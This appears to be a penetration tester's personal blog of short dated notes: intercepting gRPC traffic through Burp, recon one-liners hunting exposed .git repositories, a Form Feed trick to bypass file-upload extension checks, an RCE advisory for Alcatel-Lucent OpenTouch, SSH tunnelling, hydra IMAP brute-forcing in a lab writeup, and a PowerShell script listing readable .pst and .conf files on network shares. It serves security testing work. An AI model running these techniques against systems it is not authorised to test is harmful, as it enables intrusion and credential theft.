pi膮tek, 18 grudnia 2020

intercept http2 (grpc) in BURP SUITE PROXY

 as root:

iptables -t nat -A OUTPUT -p tcp -m owner ! --uid-owner mitmproxyuser -d 18.159.107.117 -j REDIRECT --to-port 8080          

adduser mitmproxyuser


cat /etc/nghttpx/nghttpx.conf   (downstream config)


frontend=0.0.0.0,8080;no-tls

backend=127.0.0.1,8081;;proto=http/1.1

backend-keep-alive-timeout=5m

frontend-http2-read-timeout=5m

frontend-read-timeout=5m

frontend-write-timeout=5m

stream-read-timeout=5m

stream-write-timeout=5m

backend-read-timeout=5m

backend-write-timeout=5m

backend-connect-timeout=5m

listener-disable-timeout=5m

backend-http2-window-size=134217720

backend-http2-connection-window-size=1073741760

frontend-http2-window-size=134217720

frontend-http2-connection-window-size=1073741760

http2-proxy=no

private-key-file=/etc/nghttpx/server.key

certificate-file=/etc/nghttpx/server.crt

cacert=/etc/nghttpx/ca.crt

accesslog-syslog=yes

errorlog-syslog=yes

workers=5


cat /etc/nghttpx/upstream.conf   (upstream config)

frontend=127.0.0.1,8082;no-tls

backend=vendor-IP,28900;;no-tls;proto=h2

backend-keep-alive-timeout=5m

frontend-http2-read-timeout=5m

frontend-read-timeout=5m

frontend-write-timeout=5m

stream-read-timeout=5m

stream-write-timeout=5m

backend-read-timeout=5m

backend-write-timeout=5m

backend-connect-timeout=5m

listener-disable-timeout=5m

http2-proxy=no

accesslog-syslog=yes

errorlog-syslog=yes

workers=5


run nghttp as root:


┌──(root馃拃kali)-[/etc/nghttpx]

└─# nghttpx

2020-12-18T14:38:21.383+01:00 8777 8777 99aaafb4 NOTICE (shrpx.cc:2882) Loading configuration from /etc/nghttpx/nghttpx.conf


run burp suite proxy 127.0.0.1:8081 (invisible proxy)

USER OPTIONS -> Upstream proxy add 127.0.0.1:8082


as mitmproxyuser:

┌──(mitmproxyuser㉿kali)-[/etc/nghttpx]

└─$ nghttpx --conf upstream.conf

2020-12-18T14:42:00.364+01:00 9293 9293 59e630c7 NOTICE (shrpx.cc:2882) Loading configuration from upstream.conf



as root:

run python code (client http2)











Forward local connections to local BURP PROXY / MITM PROXY


0)

sysctl -w net.ipv4.ip_forward=1

sysctl -w net.ipv6.conf.all.forwarding=1

sysctl -w net.ipv4.conf.all.send_redirects=0

 1) 

iptables -t nat -A OUTPUT -p tcp -m owner ! --uid-owner mitmproxyuser -d dst_ip -j REDIRECT --to-port 8080   

2) useradd --create-home mitmproxyuser

3) xhost +

4) sudo -u mitmproxyuser -H bash -c "export DISPLAY=:0.0;java -jar /usr/bin/burpsuite"   

or 

4) sudo -u mitmproxyuser -H bash -c "export DISPLAY=:0.0;mitmproxy"  


czwartek, 17 grudnia 2020

Virtualbox + 4k (3840x2160) resolution on guest

PS C:\Program Files\Oracle\VirtualBox> .\VBoxManage.exe setextradata global GUI/MaxGuestResolution "3840,2160"
PS C:\Program Files\Oracle\VirtualBox> .\VBoxManage.exe getextradata global GUI/MaxGuestResolution
Value: 3840,2160
PS C:\Program Files\Oracle\VirtualBox> .\VBoxManage.exe setextradata "Kali" GUI/LastGuestSizeHint "3840,2160"

艣roda, 16 wrze艣nia 2020

How to parse ffuf output file

ffuf -o output_file cat output_file | jq -c '.results[] | {url:.url,status: .status}' for file in dirb/*; do cat $file | jq -c '.results[] | {url:.url,status: .status}'; done

艣roda, 26 sierpnia 2020

find .git repo!

curl -s "https://crt.sh/?q=%25.domain.com&output=json" | jq -r '.[].name_value' | assetfinder -subs-only | sed 's#$#/.git/HEAD#g' | httpx -silent -content-length -status-code 301,302 -timeout 3 -retries 0 -ports 80,8080,443 -threads 500 -title | anew

pi膮tek, 3 lipca 2020

Form Feed U+000C

 Znak, kt贸ry czasami pozwala wyeskejpowac rozszerzenie plik贸w w apkach webowych - •
// http://www.fileformat.info/info/unicode/char/000C/index.htm

POST /api/image_upload HTTP/1.1
Host: X
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:69.0) Gecko/20100101 Firefox/69.0
Accept: */*
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Content-Type: multipart/form-data; boundary=---------------------------91652467232091688581205088441
Content-Length: 631
Connection: close


-----------------------------91652467232091688581205088441
Content-Disposition: form-data; name="file"; filename=".svg•.pdf"
Content-Type: application/pdf

xxx
-----------------------------91652467232091688581205088441--


HTTP/1.1 200 OK
Date: Fri, 03 Jul 2020 08:09:26 GMT
Server: Apache/2
Upgrade: h2,h2c
Connection: Upgrade, close
Vary: Accept-Encoding,User-Agent
Content-Length: 21
Content-Type: text/html

1593763766-94292_.svg

wtorek, 5 maja 2020

Alcatel-Lucent Security Advisory: CVE-2020-1179 (RCE)


OTMS remote code execution


I have discovered a vulnerability in OpenTouch Multimedia Services, making it possible for an attacker with administration rights to execute code on the server via web requests with high privileges.



Description of the vulnerability

Cgi script vmconstruct.cgi is vulnerable to shell command injection attacks through HTTP POST request. An attacker with an OT administrator cookie can inject arbitrary OS command using semicolon (;) character in the web request.

Impacts

OS command injection vulnerabilities can lead to elevate shell access on OT server for the attacker.


Reference: CVE-2020-11794
Date: April 15th, 2020
Risk: High
Impact: Get access
Attack expertise: Skilled, Administrative user
Attack requirements: Remote
CVSS score: 8.0 (HIGH)


czwartek, 26 marca 2020

SSH socks proxy beetwen Lan1 and Lan2

Linux in Lan1: ssh -R 5555:localhost:22 w4cky@VPS_IP -p 8080
Linux in Lan2: SSH -L 5000:127.0.0.1:5555 w4cky@VPS_IP -p 8080
Linux in Lan2: ssh -D 1234 root@localhost -p 5000

niedziela, 22 marca 2020

Lab Pentestit 14 - writeup

  1. Crack password for mail
# cat logins_mail.txt                                                                                                                        
sidorov@test.lab
ivanov@test.lab 
petrov@test.lab 
support@test.lab


hydra -L logins_mail.txt  -P /tmp/1 imap://192.168.101.14 -t 60 -f  -I                                                                             
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2020-02-12 17:45:04
[DATA] max 44 tasks per 1 server, overall 44 tasks, 44 login tries (l:4/p:11), ~1 try per task
[DATA] attacking imap://192.168.101.14:143/


[ERROR] IMAP LOGIN AUTH : 2 NO [AUTHENTICATIONFAILED] Authentication failed.


[143][imap] host: 192.168.101.14   login: support@test.lab password: PASSWORD
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2020-02-12 17:45:12


telnet 192.168.101.14 imap                                                         
Connected to 192.168.101.14.
Escape character is '^]'.
*
a1 LOGIN support@test.lab PASSWORD
a1 OK
^]
telnet> quit
Connection closed.




HackTheBox - Sauna - WriteUP

My log from the attack on the Sauna machine on HackTheBox.
The beginning was long. All fun is enumeration. Start by enumerating employee accounts. The website turns out to be useful.


poniedzia艂ek, 27 stycznia 2020

Turbo intruder sample code

def queueRequests(target, wordlists):
    engine = RequestEngine(endpoint=target.endpoint,
                           concurrentConnections=5,
                           requestsPerConnection=100,
                           pipeline=False
                           )

    for i in range(1000):
engine.queue(target.req)

    engine.start()

def handleResponse(req, interesting):
    if "cos" in req.response:
        table.add(req)

wtorek, 21 stycznia 2020

Przeszukiwanie plik贸w z dost臋pem do odczytu na zasobach - powershell

$REMOTE_HOST = "172.21.56.235"

$FILE_TYPES = "*.pst, *.conf"

net view \\$REMOTE_HOST\ |
ForEach-Object {
    $path = [regex]::match($_, '(.*)       Dysk').Groups[1].Value.Trim()

    if ($path -ne "") {
        Write-Host ("### PATH: " + $path)
        Get-ChildItem -Path \\$REMOTE_HOST\$path -Include $FILE_TYPES -Recurse -ErrorAction Ignore |
        ForEach-Object {
            Try {
                [System.IO.File]::OpenRead($_.FullName).Close()
                Write-Host $_.FullName
            }
            Catch {
                #Write-Host ("Niet: " + $_.FullName)
            }
        }
    }    
}  



//Autor: hagier